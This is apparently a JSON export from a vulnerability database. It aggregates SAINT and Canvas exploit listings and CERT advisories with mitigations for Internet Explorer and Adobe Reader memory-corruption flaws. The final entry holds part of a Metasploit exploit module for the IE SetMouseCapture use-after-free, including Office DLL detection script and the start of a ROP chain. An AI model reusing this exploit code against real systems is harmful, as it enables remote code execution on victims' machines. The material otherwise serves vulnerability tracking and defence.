References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "id": "SAINT:E4225C669F34358E2FC7EE71D604FA0A", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:DCB95B394157102378C2A8CADFE280E8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "type": "saint", "title": "Internet Explorer CButton Use After Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 01/04/2013 \nCVE: [CVE-2012-4792](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) \nBID: [57070](<http://www.securityfocus.com/bid/57070>) \nOSVDB: [88774](<http://www.osvdb.org/88774>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nAll references to DOM button objects are not properly removed when a DOM buttom object is deleted. If the stale references are used, an attempt to access unallocated memory may occur. This results in a use-after-free vulnerability. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft Security Bulletin [MS13-008](<http://technet.microsoft.com/en-us/security/Bulletin/MS13-008>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx> \n<https://threatpost.com/en_us/blogs/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912> \n<http://technet.microsoft.com/en-us/security/advisory/2794220> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-01-04T00:00:00", "published": "2013-01-04T00:00:00", "id": "SAINT:2EF245955FDA0606FF9A743D9132C6A8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cbutton_uaf", "title": "Internet Explorer CButton Use After Free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:49:58", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer versions 6, 7, 8, and 9 are susceptible to a use-after-free vulnerability ([CWE-416](<http://cwe.mitre.org/data/definitions/416.html>)) that may result in remote code execution.\n\n### Description \n\nMicrosoft Internet Explorer 6/7/8/9 contains a use-after-free vulnerability in the `CMshtmlEd::Exec()` function. An attacker may leverage this vulnerability to execute arbitrary code. This vulnerability is being actively exploited in the wild and a Metasploit module is publicly available. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\nRun [Windows Update](<http://go.microsoft.com/fwlink/?LinkID=40747>) to apply the patch for this vulnerability. [MS12-063](<http://technet.microsoft.com/en-us/security/Bulletin/MS12-063>) contains patches for this and other vulnerabilities as well. \n \nIf you cannot apply the update for whatever reason, please consider the following workarounds. \n \n--- \n \n**Apply a Microsoft Fix It utility** \n \nMicrosoft has released [Microsoft Fix it 50939](<http://support.microsoft.com/kb/2757760>) to address this vulnerability. The Fix It utility requires that all previous Windows security updates are installed to function properly. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit (EMET)](<http://www.microsoft.com/en-us/download/details.aspx?id=29851>) can be used to help prevent exploitation of this and other vulnerabilities. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research &amp; Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/b/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n \nNote that when relying on DEP for exploit mitigation, it is important to use a system that supports Address Space Layout Randomization (ASLR) as well. ASLR is not supported by Windows XP or Windows Server 2003 or earlier. ASLR was introduced with Microsoft Windows Vista and Windows Server 2008. Please see the Microsoft SRD blog entry: [On the effectiveness of DEP and ASLR](<http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx>) for more details. \n \nThe [MSRC blog post](<http://blogs.technet.com/b/msrc/archive/2012/09/17/microsoft-releases-security-advisory-2757760.aspx>) lists the following mitigations for this vulnerability. \n\n\n * _Set Internet and local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones_\n * _This will help prevent exploitation but may affect usability; therefore, trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption._\n * _ Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and local intranet security zones_\n * _This will help prevent exploitation but can affect usability, so trusted sites should be added to the Internet Explorer Trusted Sites zone to minimize disruption._\n \n**Use a different web browser** \n \nUntil Microsoft has released a patch for this vulnerability, consider using a different web browser for viewing untrusted web sites. \n--- \n \n### Vendor Information\n\n480095\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Microsoft Corporation\n\nUpdated: September 17, 2012 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.7 | AV:N/AC:L/Au:N/C:C/I:C/A:P \nTemporal | 9.2 | E:H/RL:W/RC:C \nEnvironmental | 6.9 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://blogs.technet.com/b/msrc/archive/2012/09/17/microsoft-releases-security-advisory-2757760.aspx>\n * <http://technet.microsoft.com/en-us/security/advisory/2757760>\n * <http://cwe.mitre.org/data/definitions/416.html>\n * <http://osvdb.org/85532>\n * <http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/>\n * <https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit>\n * <https://www.virustotal.com/file/70f6a2c2976248221c251d9965ff2313bc0ed0aebb098513d76de6d8396a7125/analysis/1347710461/>\n * <https://www.virustotal.com/file/9d66323794d493a1deaab66e36d36a820d814ee4dd50d64cddf039c2a06463a5/analysis/1347710777/>\n * <http://dev.metasploit.com/redmine/projects/framework/repository/revisions/48a46f3b9415091a0cc76bd857a6bf90284b9fcd/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rb>\n * <http://labs.alienvault.com/labs/index.php/2012/new-internet-explorer-zero-day-being-exploited-in-the-wild/>\n\n### Acknowledgements\n\nThis vulnerability was discovered in the wild.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-4969](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4969>) \n---|--- \n**Date Public:** | 2012-09-17 \n**Date First Published:** | 2012-09-17 \n**Date Last Updated: ** | 2012-09-21 17:16 UTC \n**Document Revision: ** | 31 \n", "modified": "2012-09-21T17:16:00", "published": "2012-09-17T00:00:00", "id": "VU:480095", "href": "https://www.kb.cert.org/vuls/id/480095", "type": "cert", "title": "Microsoft Internet Explorer 6/7/8/9 contain a use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:49:48", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the CButton object, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Internet Explorer contains a use-after-free vulnerability in the mshtml CButton object. Specially-crafted JavaScript can cause Internet Explorer to free the CButton object without removing a pointer, resulting in a state where Internet Explorer may attempt to call an invalid memory address. This memory address may be under the control of the attacker.\n\nThis vulnerability is currently being exploited in the wild, using Adobe Flash to achieve a heap spray and Java to provide Return Oriented Programming (ROP) gadgets. Other proof-of-concept exploits are publicly available that do not use heap spraying. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), Microsoft Office document, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nMicrosoft has released [MS13-008](<https://technet.microsoft.com/en-us/security/bulletin/ms13-008>) to address this vulnerability. Users should run Windows Update to receive the patch. If a user is unable to update, please consider the following workarounds: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. \n \n**Apply the Microsoft Fix It** \n \nMicrosoft has provided a \"Fix it\" patch that causes Internet Explorer to safely crash if this vulnerability is attempted to be exploited, rather than resulting in code execution. Please see the [Microsoft SRD blog entry](<http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>) for more details. Note that Windows must be fully-patched for the Fix it to be effective. There is also a report that the Fix it [is insufficient](<http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>) to completely address the vulnerability. \n \n**Disable the Flash ActiveX control in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Flash may break some exploits. The Flash ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n\n\n`{D27CDB6E-AE6D-11cf-96B8-444553540000}`More information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n\n\n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400` \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{D27CDB6E-AE6D-11cf-96B8-444553540000}]` \n`\"Compatibility Flags\"=dword:00000400`**Disable Java in Internet Explorer** \n \nWhile it does not address the underlying vulnerability in Internet Explorer, disabling Java may break some exploits. Starting with Java 7 Update 10, it is possible to disable Java content in web browsers through the Java control panel applet. Please see the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>) for more details. \n--- \n \n### Vendor Information\n\n**Javascript is disabled. Click here to view vendors.**\n\nNo information available at this time. \n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.0 | E:H/RL:W/RC:UR \nEnvironmental | 9 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://technet.microsoft.com/en-us/security/bulletin/ms13-008>\n * <http://technet.microsoft.com/en-us/security/advisory/2794220>\n * <http://blogs.technet.com/b/srd/archive/2012/12/31/microsoft-quot-fix-it-quot-available-for-internet-explorer-6-7-and-8.aspx>\n * <http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx>\n * <http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/>\n * <http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/>\n * <http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/>\n * <http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html>\n * <http://labs.alienvault.com/labs/index.php/2012/just-another-water-hole-campaign-using-an-internet-explorer-0day>\n * <http://support.microsoft.com/kb/2458544>\n * <http://www.youtube.com/watch?v=28_LUs_g0u4>\n * <http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>\n\n### Acknowledgements\n\nThis vulnerability was described by Eric Romang and FireEye.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) \n---|--- \n**Date Public:** | 2012-12-28 \n**Date First Published:** | 2012-12-29 \n**Date Last Updated: ** | 2013-01-14 21:59 UTC \n**Document Revision: ** | 42 \n", "modified": "2013-01-14T21:59:00", "published": "2012-12-29T00:00:00", "id": "VU:154201", "href": "https://www.kb.cert.org/vuls/id/154201", "type": "cert", "title": "Microsoft Internet Explorer CButton use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:48:54", "bulletinFamily": "info", "description": "### Overview \n\nAdobe Reader and Acrobat 11.0.01 and earlier, 10.1.5 and earlier, and 9.5.3 and earlier contain memory corruption vulnerabilities.\n\n### Description \n\nThe Adobe security bulletin[](<https://www.adobe.com/support/security/advisories/apsa13-02.html>) [APSB13-07](<https://www.adobe.com/support/security/bulletins/apsb13-07.html>) states:\n\n_Adobe has released security updates for Adobe Reader and Acrobat XI (11.0.01 and earlier) for Windows and Macintosh, X (10.1.5 and earlier) for Windows and Macintosh, 9.5.3 and earlier 9.x versions for Windows and Macintosh, and Adobe Reader 9.5.3 and earlier 9.x versions for Linux. These updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system._ \n \nAdditional details may be found in the full [](<https://www.adobe.com/support/security/advisories/apsa13-02.html>)bulletin [APSB13-07](<https://www.adobe.com/support/security/bulletins/apsb13-07.html>). \n \n--- \n \n### Impact \n\nA remote attacker may be able to cause a denial of service or execute arbitrary code on the system in the context of the user running the Adobe product. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nThe Adobe security bulletin[](<https://www.adobe.com/support/security/advisories/apsa13-02.html>) [APSB13-07](<https://www.adobe.com/support/security/bulletins/apsb13-07.html>) states: \n \n__Adobe Reader__ \n \n_Users on Windows and Macintosh can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help &gt; Check for Updates._ \n \n_Adobe Reader users on Windows can also find the appropriate update here:_ \n_[http://www.adobe.com/support/downloads/product.jsp?product=10&amp;platform=Windows](<http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows>)_ \n \n_Adobe Reader users on Macintosh can also find the appropriate update here:_ \n_[http://www.adobe.com/support/downloads/product.jsp?product=10&amp;platform=Macintosh](<http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Macintosh>)_ \n \n_Adobe Reader users on Linux can find the appropriate update here: __<ftp://ftp.adobe.com/pub/adobe/reader/unix/9.x/>_ \n \n__Adobe Acrobat__ \n \n_Users can utilize the product's update mechanism. The default configuration is set to run automatic update checks on a regular schedule. Update checks can be manually activated by choosing Help &gt; Check for Updates._ \n \n_Acrobat Standard, Pro and Pro Extended users on Windows can also find the appropriate update here:_ \n_[http://www.adobe.com/support/downloads/product.jsp?product=1&amp;platform=Windows](<http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows>)_ \n \n_Acrobat Pro users on Macintosh can also find the appropriate update here:_ \n_[http://www.adobe.com/support/downloads/product.jsp?product=1&amp;platform=Macintosh](<http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Macintosh>)_ \n \nPlease consider the following workarounds, if you are unable to apply the update. \n \n--- \n \n**Enable Protected View** \n \nUsers of Adobe Reader XI and Acrobat XI for Windows can protect themselves from this exploit by enabling Protected View. To enable this setting, choose the \"Files from potentially unsafe locations\" option under the Edit &gt; Preferences &gt; Security (Enhanced) menu. \n \n**Disable Javascript** \n \nTo disable Javascript in Adobe Reader and Acrobat, uncheck \"Enable Acrobat JavaScript\" under the Edit &gt; Preferences &gt; JavaScript menu. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research &amp; Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n \nNote that when relying on DEP for exploit mitigation, it is important to use a system that supports Address Space Layout Randomization (ASLR) as well. ASLR is not supported by Windows XP or Windows Server 2003 or earlier. ASLR was introduced with Microsoft Windows Vista and Windows Server 2008. Please see the Microsoft SRD blog entry: [On the effectiveness of DEP and ASLR](<http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx>) for more details. \n \n--- \n \n### Vendor Information\n\n422807\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Adobe\n\nUpdated: February 14, 2013 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.adobe.com/support/security/advisories/apsa13-02.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 8.1 | E:H/RL:OF/RC:C \nEnvironmental | 8.3 | CDP:L/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.adobe.com/support/security/bulletins/apsb13-07.html>\n * <https://www.adobe.com/support/security/advisories/apsa13-02.html>\n * <https://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/protectedview.html>\n * <http://blogs.mcafee.com/mcafee-labs/digging-into-the-sandbox-escape-technique-of-the-recent-pdf-exploit>\n\n### Acknowledgements\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-0640, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640>) [CVE-2013-0641](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641>) \n---|--- \n**Date Public:** | 2013-02-13 \n**Date First Published:** | 2013-02-14 \n**Date Last Updated: ** | 2014-07-30 06:41 UTC \n**Document Revision: ** | 17 \n", "modified": "2014-07-30T06:41:00", "published": "2013-02-14T00:00:00", "id": "VU:422807", "href": "https://www.kb.cert.org/vuls/id/422807", "type": "cert", "title": "Adobe Reader and Acrobat memory corruption vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T19:48:28", "bulletinFamily": "exploit", "description": "**Name**| ie_execCommand \n---|--- \n**CVE**| CVE-2012-4969 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_execCommand \n**Notes**| CVE Name: CVE-2012-4969 \nVENDOR: Microsoft \nNotes: \n \nVersionsAffected: \nRepeatability: Infinite \nReferences: ['http://technet.microsoft.com/en-us/security/advisory/2757760'] \nDate public: 09/17/2012 \nMSADV: MS12-063 \n\n", "modified": "2012-09-18T10:39:00", "published": "2012-09-18T10:39:00", "id": "IE_EXECCOMMAND", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_execCommand", "type": "canvas", "title": "Immunity Canvas: IE_EXECCOMMAND", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "description": "**Name**| acrobat_xfa \n---|--- \n**CVE**| CVE-2013-0640 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Adobe Acrobat Reader XFA (&lt;=10.X) \n**Notes**| CVE Name: CVE-2013-0640 \nVENDOR: Adobe \nVersionsAffected: 10.X and below \nRepeatability: \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0640 \nCERT Advisory: None \nCVSS: 9.3 \n\n", "modified": "2013-02-14T01:55:00", "published": "2013-02-14T01:55:00", "id": "ACROBAT_XFA", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_xfa", "title": "Immunity Canvas: ACROBAT_XFA", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-11T15:53:22", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a use-after-free vulnerability that targets Internet Explorer 9 on Windows 7. The flaw most likely exists in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and passed on to more functions, eventually arriving in function MSHTML!CTreeNode::GetInterface, and causing a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "1337DAY-ID-21313", "href": "https://0day.today/exploit/description/21313", "type": "zdt", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability that currents targets Internet\r\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\r\n It was initially found in the wild in Japan, but other regions such as English,\r\n Chinese, Korean, etc, were targeted as well.\r\n\r\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\r\n reference during an event. An attacker first can setup two elements, where the second\r\n is the child of the first, and then setup a onlosecapture event handler for the parent\r\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\r\n one for the parent element, one for the child. When the setCapture() call for the child\r\n element is called, it finally triggers the event, which allows the attacker to cause an\r\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\r\n memory. The exact size of this memory may differ based on the version of IE. After the\r\n free, an invalid reference will still be kept and pass on to more functions, eventuall\r\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\r\n code execution) when this function attempts to use this reference to call what appears to\r\n be a PrivateQueryInterface due to the offset (0x00).\r\n\r\n To mimic the same exploit found in the wild, this module will try to use the same DLL\r\n from Microsoft Office 2007 or 2010 to leverage the attack.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild first spotted in Japan\r\n 'sinn3r' # Metasploit (thx binjo for the heads up!)\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3893' ],\r\n [ 'OSVDB', '97380' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def is_win7_ie9?(agent)\r\n (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/)\r\n end\r\n\r\n def get_preq_html(cli, req)\r\n %Q|\r\n<html>\r\n<script>\r\n function getDLL() {\r\n var checka = 0;\r\n var checkb = 0;\r\n\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\r\n return \"office2010\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n return \"office2007\";\r\n }\r\n\r\n return \"na\";\r\n }\r\n\r\n window.onload = function() {\r\n document.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL();\r\n }\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(rop_dll)\r\n code = payload.encoded\r\n rop = ''\r\n p = ''\r\n\r\n case rop_dll\r\n when :office2007\r\n rop = \r\n [\r\n junk, # Alignment\r\n 0x51c46f91, # POP EBP # RETN [hxds.dll] \r\n 0x51c46f91, # skip 4 bytes [hxds.dll]\r\n 0x51c35a4d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bd90fd, # 